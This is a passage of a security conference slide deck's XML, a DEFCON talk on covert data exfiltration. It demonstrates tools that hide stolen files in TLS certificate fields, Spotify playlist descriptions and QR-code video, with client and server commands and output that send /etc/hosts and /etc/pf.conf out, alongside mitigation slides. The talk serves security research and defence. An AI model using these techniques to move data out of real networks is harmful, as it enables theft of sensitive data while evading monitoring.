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Arvo" panose="02000000000000000000" pitchFamily="2" charset="77"/>
      <p:regular r:id="rId41"/>
      <p:bold r:id="rId42"/>
      <p:italic r:id="rId43"/>
      <p:boldItalic r:id="rId44"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Comfortaa" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId45"/>
      <p:bold r:id="rId46"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Comfortaa Light" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId47"/>
      <p:bold r:id="rId48"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Comfortaa SemiBold" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId49"/>
      <p:bold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Fira Sans" panose="020B0503050000020004" pitchFamily="34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Varela Round" pitchFamily="2" charset="-79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61" d="100"/>
          <a:sy n="161" d="100"/>
        </p:scale>
        <p:origin x="48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groups/G0082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s-cert.cisa.gov/ncas/alerts/aa20-239a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Slideshow / play for animations</a:t>
            </a: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434911b7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434911b7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aae737943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aae737943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487e5a32e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487e5a32e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aae737943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aae737943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*EDR, Sysmon and Applocker on windows might help there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 inside TLS session ..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8fab3b4b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8fab3b4b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434911b7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434911b7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1d1db87b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1d1db87b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aae73794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aae73794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b0db862c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b0db862c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aae737943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aae737943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434911b7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434911b7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1d1db87b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1d1db87b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aae73794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aae73794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goes beyond -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>SaaS applications allowing personal logins</a:t>
            </a:r>
            <a:endParaRPr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8fab3b4b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8fab3b4b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34911b7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434911b7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8fab3b4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8fab3b4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aae737943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aae737943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aae737943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aae737943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3e5b5c95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3e5b5c95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b0db862cb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b0db862cb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3e5b5c95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3e5b5c95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aae73794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aae73794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8fab3b4b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8fab3b4b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aae737943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aae737943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aae737943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aae737943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binary NOT doing any connection is tough - strict applocker policy on windows?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3e5b5c951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3e5b5c951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8fab3b4b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8fab3b4b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Those exemple were not that crazy (check BVP47) Pangu lab report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Catch attackers before reaching that phase:  make hard to have a valid path before reaching Data exfil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Ensure SaaS logins are *@corp.com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28b4359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428b43590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2961290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42961290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28b43590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28b43590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7CAC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APT38</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="39434C"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="4F7CAC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" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="39434C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4fed6fb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4fed6fb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434911b7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434911b7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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Data pushed to WEB/FTP sites</a:t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8fab3b4b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8fab3b4b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434911b7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434911b7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1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>allows a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 certificate subject to be associated with the service name and domain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 name components of a DNS Service Resource Record.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434911b7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434911b7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aae73794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aae73794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aae73794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aae737943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10800000" flipH="1">
            <a:off x="0" y="4989500"/>
            <a:ext cx="9134400" cy="87300"/>
          </a:xfrm>
          <a:prstGeom prst="doubleWave">
            <a:avLst>
              <a:gd name="adj1" fmla="val 6250"/>
              <a:gd name="adj2" fmla="val 10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28650" dist="485775" dir="8280000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="3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 l="8704" r="8704"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8733350" y="96546"/>
            <a:ext cx="287802" cy="348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urcefrenchy/DEFCON-30---Exotic-Data-Exfiltration/createhttps:/github.com/sourcefrenchy/DEFCON-30---Exotic-Data-Exfiltration/raw/main/video.mp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sourcefrenchy/certexfil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github.com/sourcefrenchy/goqrexfil" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sourcefrenchy/spotexfil" TargetMode="External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itre-attack.github.io/attack-navigator/#layerURL=https%3A%2F%2Fattack.mitre.org%2Fgroups%2FG0007%2FG0007-enterprise-layer.json%60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cs.opensource.google/go/go/+/master:src/crypto/tls/common.go;bpv=1;bpt=1;l=44?q=65536&amp;ss=go%2Fgo&amp;start=11&amp;gsn=maxHandshake&amp;gs=kythe%3A%2F%2Fgo.googlesource.com%2Fgo%3Flang%3Dgo%3Fpath%3Dcrypto%2Ftls%23const%2520maxHandshake" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cs.opensource.google/go/go/+/master:src/crypto/tls/common.go;l=44;bpv=1;bpt=1?q=65536&amp;ss=go%2Fgo&amp;start=1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3916550" y="-42925"/>
            <a:ext cx="5322025" cy="5322025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="57150" dist="19050" dir="6960000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="14000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst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629700" y="611550"/>
            <a:ext cx="56277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Varela Round"/>
                <a:ea typeface="Varela Round"/>
                <a:cs typeface="Varela Round"/>
                <a:sym typeface="Varela Round"/>
              </a:rPr>
              <a:t>Exotic Data Exfiltration</a:t>
            </a:r>
            <a:endParaRPr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35900" y="3489250"/>
            <a:ext cx="8272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“techniques [...] use to steal data from your network […] Techniques for getting data out of a target network”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" i="1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n" sz="1700" i="1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–MITRE ATT&amp;CK</a:t>
            </a:r>
            <a:endParaRPr sz="1700" i="1">
              <a:solidFill>
                <a:srgbClr val="9FC5E8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29700" y="4631763"/>
            <a:ext cx="270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Arvo"/>
                <a:ea typeface="Arvo"/>
                <a:cs typeface="Arvo"/>
                <a:sym typeface="Arvo"/>
              </a:rPr>
              <a:t>Jean-Michel Amblat</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="EFEFE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29700" y="2244225"/>
            <a:ext cx="6867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Exploring three different ideas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4626450" y="3034350"/>
            <a:ext cx="4152900" cy="19002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5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Client                              Server  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266125" y="1096425"/>
            <a:ext cx="4305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./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certexfil --host remote --payload /etc/hosts</a:t>
            </a:r>
            <a:endParaRPr sz="1200"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18:52:23 [*] Reading from file..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18:52:24 [D] Payload (raw)  --&gt; 127.0.0.1	...(225 bytes)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18:52:24 [D] Payload (Prepare()) --&gt; �...		(173 bytes)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18:52:24 [*] Generated custom cert with payload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572025" y="1096425"/>
            <a:ext cx="44601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.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/certexfil --listen</a:t>
            </a:r>
            <a:endParaRPr sz="1300"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22:51:01 [*] Starting listener..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22:52:24 [*] Payload received: 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H4sIAAAAAAAC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/0TNMa7DIAwG4DmcwtKbH4IMqcQNunXoBQgxDaoDCJOmx69o08abP1v/r/uTVFJJ3VFylubEVXxMS91tIVYsy1pRiD+4zgg+EaUtxBtQiMhgC8KEHIodqV0LnC+PAZzNb2h5LIzR0Cbk4f9Xs28pj9bdhUeljFHHS8QqvD9wcZZrLujDs3nfMptbopgm5B37L5a0ViwsXgEAAP//pJPCNuEAAAA=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2019/05/31 22:52:24 [*] Payload decoded: 127.0.0.1	localhost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127.0.1.1	wintermute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The following lines are desirable for IPv6 capable hosts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::1     ip6-localhost ip6-loopback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fe00::0 ip6-localnet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ff00::0 ip6-mcastprefix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ff02::1 ip6-allnodes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ff02::2 ip6-allrouters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266125" y="2976625"/>
            <a:ext cx="43833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12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openssl x509 -in ./CERTS/client_cert.pem -text -noout | grep -A 1 "Subject Alternative Name" | cut -c1-500 </a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1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X509v3 Subject Alternative Name:</a:t>
            </a:r>
            <a:endParaRPr sz="12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DNS:remote,DNS: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H4sIAAAAAAAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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/0TNMa7DIAwG4DmcwtKbH4IMqcQNunXoBQgxDaoDCJOmx69o08abP1v/r/uTVFJJ3VFylubEVXxMS91tIVYsy1pRiD+4zgg+EaUtxBtQiMhgC8………………………………………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Custom certificate used for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mTLS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> only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Custom certificate with payload in SAN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429750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WHAT IS REALLY NEEDED</a:t>
            </a:r>
            <a:endParaRPr sz="20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New app/binary connecting out 😋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Capture all certs in use? Detect new certs? or large certs or invalid certs? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>😐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219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Idea </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="24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#</a:t>
            </a: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2</a:t>
            </a:r>
            <a:endParaRPr sz="2820">
              <a:solidFill>
                <a:srgbClr val="FF99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Fun with a Music streaming app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7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1005391" y="139313"/>
            <a:ext cx="7133225" cy="4754326"/>
            <a:chOff x="317153" y="200875"/>
            <a:chExt cx="7133225" cy="4754326"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="166" name="Google Shape;16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153" y="200875"/>
              <a:ext cx="7133225" cy="4754326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67" name="Google Shape;167;p27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5337225" y="513375"/>
              <a:ext cx="571500" cy="8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200" y="345275"/>
            <a:ext cx="5845299" cy="38968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5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="1839" r="1849"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5659000" y="1986525"/>
            <a:ext cx="1324899" cy="10599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00" y="1072925"/>
            <a:ext cx="8216402" cy="39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4662100" y="2135950"/>
            <a:ext cx="3954000" cy="2880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00" y="1072925"/>
            <a:ext cx="8216402" cy="39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4836625" y="4122950"/>
            <a:ext cx="4152900" cy="19002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 dirty="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Client				Server</a:t>
            </a:r>
            <a:endParaRPr sz="2820" b="1" dirty="0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266125" y="1096425"/>
            <a:ext cx="4570500" cy="3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.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/spotexfil_client.py -f /etc/pf.conf</a:t>
            </a:r>
            <a:endParaRPr sz="1300"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Data cleared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checksum plaintext </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="12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8b095411047fe913aa07e7bc3e7540f7c2a8a134</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1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Generating playlists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	[*] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="12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Creating 1-payloadChunk</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1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DATA="IwojIERlZmF1bHQgUEYgY29uZmlndXJhdGlvbiBmaWxlLgojCiMgVGhpcyBmaWxlIGNvbnRhaW5zIHRoZSBtYWluIHJ1bGVzZXQsIHdoaWNoIGdldHMgYXV0b21hdGljYWxseSBsb2FkZWQKIyBhdCBzdGFydHVw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LiAgUEYgd2lsbCBub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3QgYmUgYXV0b21hdGljYWxseSBlbmFibGVkLCBob3dldmVyLiAgSW5zdGVhZCwKIyBlYWNoIGNvbXBvbmVudCB3aGljaCB1dGlsaXplcyBQRiBpcyByZXNwb25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	[*] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="12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Creating 2-payloadChunk</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1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DATA=zaWJsZSBmb3IgZW5hYmxpbmcgYW5kIGRpc2FibGluZwojIFBGIHZpYSAtRSBhbmQgLVggYXMgZG9jdW1lbnRlZCBpbiBwZmN0bCg4KS4gIFRoYXQgd2lsbCBlbnN1cmUgdGhhdCBQRgojIGlzIGRpc2FibGVkIG9ubHkgd2hlbiB0aGUgbGFzdCBlbmFibGUgcmVmZXJlbmNl…………………………………………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4778475" y="1096425"/>
            <a:ext cx="4301400" cy="7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./spotexfil_server.py -r</a:t>
            </a:r>
            <a:endParaRPr sz="1300"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Retrieving playlists</a:t>
            </a:r>
            <a:endParaRPr sz="11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	[*]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="11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Retrieving 1-payloadChunk</a:t>
            </a:r>
            <a:endParaRPr sz="1100" b="1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DATA="IwojIERlZmF1bHQgUEYgY29uZmlndXJhdGlvbiBmaWxlLgojCiMgVGhpcyBmaWxlIGNvbnRhaW5zIHRoZSBtYWluIHJ1bGVzZXQsIHdoaWNoIGdldHMgYXV0b21hdGljYWxseSBsb2FkZWQKIyBhdCBzdGFydHVw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1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LiAgUEYgd2lsbCBub</a:t>
            </a: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3QgYmUgYXV0b21hdGljYWxseSBlbmFibGVkLCBob3dldmVyLiAgSW5zdGVhZCwKIyBlYWNoIGNvbXBvbmVudCB3aGljaCB1dGlsaXplcyBQRiBpcyByZXNwb25</a:t>
            </a:r>
            <a:endParaRPr sz="11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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="11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Retrieving 2-payloadChunk</a:t>
            </a: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	DATA=zaWJsZSBmb3IgZW5hYmxpbmcgYW5kIGRpc2FibGluZwojIFBGIHZpYSAtRSBhbmQgLVggYXMgZG9jdW1lbnRlZCB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…………………………………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checksum payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="11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8b095411047fe913aa07e7bc3e7540f7c2a8a134</a:t>
            </a:r>
            <a:endParaRPr sz="11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Default PF configuration file.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This file contains the main ruleset, which gets automatically loaded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at startup.  PF will not be automatically enabled, however.  Instead,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each component which utilizes PF is responsible for enabling and disabling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PF via -E and -X as documented in pfctl(8).  That will ensure that PF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is disabled only when the last enable reference is released.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Care must be taken to ensure that the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main ruleset does not get flushed,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as the nested anchors rely on the anchor po</a:t>
            </a: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int defined here. In addition,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to the anchors loaded by this file, some system services would dynamically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insert anchors into the main ruleset. These anchors will be added only when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the system service is used and would removed on termination of the service.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# See p</a:t>
            </a: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4119925" y="2552775"/>
            <a:ext cx="507900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❯ whoami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432125"/>
            <a:ext cx="611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          </a:t>
            </a:r>
            <a:endParaRPr sz="145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408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61"/>
              <a:buFont typeface="Arvo"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="166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Father, husband, UNIX security guy &amp; gamer</a:t>
            </a:r>
            <a:endParaRPr sz="166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408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61"/>
              <a:buFont typeface="Arvo"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="166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20+ years in security, mostly SecEng</a:t>
            </a:r>
            <a:endParaRPr sz="166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506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n" sz="1506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n" sz="1406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 Soon: Security Engineering at a Trading firm</a:t>
            </a:r>
            <a:endParaRPr sz="1406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6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   Previously: Matrox, Ubisoft, Canary, PDT Partners</a:t>
            </a:r>
            <a:endParaRPr sz="1406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408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61"/>
              <a:buFont typeface="Arvo"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="166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Passion for national security topics, security &amp; privacy</a:t>
            </a:r>
            <a:endParaRPr sz="166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408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61"/>
              <a:buFont typeface="Arvo"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="166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Occasionally break/abuse applications/services</a:t>
            </a:r>
            <a:endParaRPr sz="166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295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225" y="601825"/>
            <a:ext cx="2410199" cy="188112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225" y="2825694"/>
            <a:ext cx="2410199" cy="1881132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" name="Google Shape;70;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="560350" y="1138675"/>
            <a:ext cx="500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F3F3F3"/>
                </a:solidFill>
                <a:latin typeface="Arvo"/>
                <a:ea typeface="Arvo"/>
                <a:cs typeface="Arvo"/>
                <a:sym typeface="Arvo"/>
              </a:rPr>
              <a:t>Jean-Michel “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:latin typeface="Arvo"/>
                <a:ea typeface="Arvo"/>
                <a:cs typeface="Arvo"/>
                <a:sym typeface="Arvo"/>
              </a:rPr>
              <a:t>JM”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:latin typeface="Arvo"/>
                <a:ea typeface="Arvo"/>
                <a:cs typeface="Arvo"/>
                <a:sym typeface="Arvo"/>
              </a:rPr>
              <a:t> Amblat</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F3F3F3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Data is embedded in the playlist description</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (no one checks that)</a:t>
            </a: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“Trusted” third-party: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spotify is just music streaming</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> … 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0" name="Google Shape;210;p33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Data is embedded in the playlist description</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (no one checks that)</a:t>
            </a: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“Trusted” third-party: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spotify is just music streaming</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> … 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211" name="Google Shape;211;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4297500" y="1541975"/>
            <a:ext cx="4846500" cy="25719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WHAT IS REALLY NEEDED</a:t>
            </a:r>
            <a:endParaRPr sz="20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New app/binary connecting to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>spotify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>😋</a:t>
            </a:r>
            <a:endParaRPr sz="1800" strike="sngStrike" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D9D9D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Custom signatures to drop create* API calls? 😂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Deny Spotify and other streaming apps? 👀</a:t>
            </a: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311700" y="219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Idea </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="24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#</a:t>
            </a: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3</a:t>
            </a:r>
            <a:endParaRPr sz="2820">
              <a:solidFill>
                <a:srgbClr val="FF99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Quick Response code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#3: Side-channel fun for insiders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l="5516" r="5516"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1170125"/>
            <a:ext cx="5439110" cy="382097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146" y="1170125"/>
            <a:ext cx="3037676" cy="29071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683" y="3297434"/>
            <a:ext cx="2462626" cy="163876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38" y="41475"/>
            <a:ext cx="8658330" cy="506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050" y="1975800"/>
            <a:ext cx="3709174" cy="242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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5527700" y="0"/>
            <a:ext cx="3969900" cy="54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4256300" y="-46200"/>
            <a:ext cx="1271400" cy="523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38" y="41475"/>
            <a:ext cx="8658330" cy="506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050" y="1975800"/>
            <a:ext cx="3709174" cy="242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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5527700" y="0"/>
            <a:ext cx="3969900" cy="54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38" y="41475"/>
            <a:ext cx="8658330" cy="506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4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="3095" b="3104"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5754050" y="2231650"/>
            <a:ext cx="3465375" cy="22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Client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266125" y="1096425"/>
            <a:ext cx="8760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./goqrexfil -client &lt; ~/Downloads/KS.jpeg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="13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300" i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(4.7K)</a:t>
            </a:r>
            <a:endParaRPr sz="1200" i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Client mode: ON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Loading payload from file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Plaintext hash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7da87fa4b496372f2df35482e9413eee43b4165d13aae17bb4c07ad6ffe135c4</a:t>
            </a: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Payload will be in 33 chunks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Start your video, displaying in &gt; 3 &lt; seconds ****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3d015f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b0d3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993220808b264fd8b51f3475540385d867e96cafe75cafa261fdf5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659b26b507e15e1426e6e06c65bb0a1aefcadb4cc2c860acfbf9c1b3462b3277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c20d1275e18dec791b772a82dc77e33b24c53ae4b20cc35ee79a8904db662f02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4a71b1345c0b9b58870a76aeea7b7f21068ed5aa466c6bd7012359db5562633d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………………………………………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Client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266125" y="1096425"/>
            <a:ext cx="8760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./goqrexfil -client &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="13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~/Downloads/KS.jpeg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Client mode: ON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Loading payload from file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Plaintext hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1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7da87fa4b496372f2df35482e9413eee43b4165d13aae17bb4c07ad6ffe135c4</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1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Payload will be in 33 chunks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Start your video, displaying in &gt; 3 &lt; seconds ****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3d015f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b0d3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993220808b264fd8b51f3475540385d867e96cafe75cafa261fdf5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659b26b507e15e1426e6e06c65bb0a1aefcadb4cc2c860acfbf9c1b3462b3277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c20d1275e18dec791b772a82dc77e33b24c53ae4b20cc35ee79a8904db662f02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DATA_HASH = 4a71b1345c0b9b58870a76aeea7b7f21068ed5aa466c6bd7012359db5562633d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Creating QR code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………………………………………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1" name="Google Shape;261;p40" title="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25" y="389125"/>
            <a:ext cx="5136350" cy="38522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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="266125" y="1096425"/>
            <a:ext cx="87609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3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./goqrexfil -server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Server mode: ON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INFO[0000] Serving on port 9999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973" y="220025"/>
            <a:ext cx="3942849" cy="8275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25" y="927825"/>
            <a:ext cx="3563725" cy="9540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3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Server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266125" y="1936550"/>
            <a:ext cx="80658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Cleaning old files and extracting video frames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[***] Extracting data from 799 frames, skipping duplicates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Retrieving data from  public/203.png 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  DATA_HASH = 3d015f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b0d3</a:t>
            </a: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993220808b264fd8b51f3475540385d867e96cafe75cafa261fdf5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Retrieving data from  public/219.png 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  DATA_HASH = 659b26b507e15e1426e6e06c65bb0a1aefcadb4cc2c860acfbf9c1b3462b3277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Retrieving data from  public/235.png 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  DATA_HASH = c20d1275e18dec791b772a82dc77e33b24c53ae4b20cc35ee79a8904db662f02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Retrieving data from  public/252.png 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  DATA_HASH = 4a71b1345c0b9b58870a76aeea7b7f21068ed5aa466c6bd7012359db5562633d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Retrieving data from  public/288.png .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………………………………………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[I] Deleted previous payload file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[*] Payload saved as  ./payload/payload.bin</a:t>
            </a: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Payload hash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7da87fa4b496372f2df35482e9413eee43b4165d13aae17bb4c07ad6ffe135c4</a:t>
            </a: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203100"/>
            <a:ext cx="5330100" cy="24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Current landscape</a:t>
            </a:r>
            <a:endParaRPr sz="2000" b="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Exploring 3 ideas &amp; Proofs of Concept</a:t>
            </a:r>
            <a:endParaRPr sz="2000" b="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vo"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="20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Playing with certs</a:t>
            </a:r>
            <a:endParaRPr sz="20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vo"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="20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Music streaming app</a:t>
            </a:r>
            <a:endParaRPr sz="20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vo"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="20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Quick Response code</a:t>
            </a:r>
            <a:endParaRPr sz="20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6" name="Google Shape;276;p42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Physical presence required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QR codes are just displayed: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EXFIL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IS NOT USING THE NETWORK</a:t>
            </a:r>
            <a:endParaRPr sz="1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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1586825"/>
            <a:ext cx="4846500" cy="24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8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6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89" name="Google Shape;28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Possible mitigations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0" name="Google Shape;290;p44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2216850" y="1316375"/>
            <a:ext cx="4710300" cy="30231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IoAs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RED TEAM / Attacker </a:t>
            </a:r>
            <a:endParaRPr sz="21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Physical presence required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i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Download the “client”</a:t>
            </a:r>
            <a:endParaRPr sz="1900" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1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QR codes are just displayed: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EXFIL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IS NOT USING THE NETWORK</a:t>
            </a:r>
            <a:endParaRPr sz="1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291" name="Google Shape;291;p44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4084825" y="1316375"/>
            <a:ext cx="5059200" cy="30231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WHAT IS REALLY NEEDED</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49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New app/binary detected.. But not connection out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>😐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Cameras at the office with 24/7 staff watching? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>😕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Deny electronic recording devices in some areas? (e.g., similar to Trading floors) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>😕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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="607850" y="4414700"/>
            <a:ext cx="773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Relax now … we’re done!</a:t>
            </a:r>
            <a:endParaRPr sz="20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625" y="661263"/>
            <a:ext cx="5902749" cy="382097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242150" y="1017725"/>
            <a:ext cx="5867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Imagination +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="9FC5E8"/>
                </a:solidFill>
                <a:latin typeface="Fira Sans"/>
                <a:ea typeface="Fira Sans"/>
                <a:cs typeface="Fira Sans"/>
                <a:sym typeface="Fira Sans"/>
              </a:rPr>
              <a:t> embed(b64(sensitive_data),  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" i="1">
                <a:solidFill>
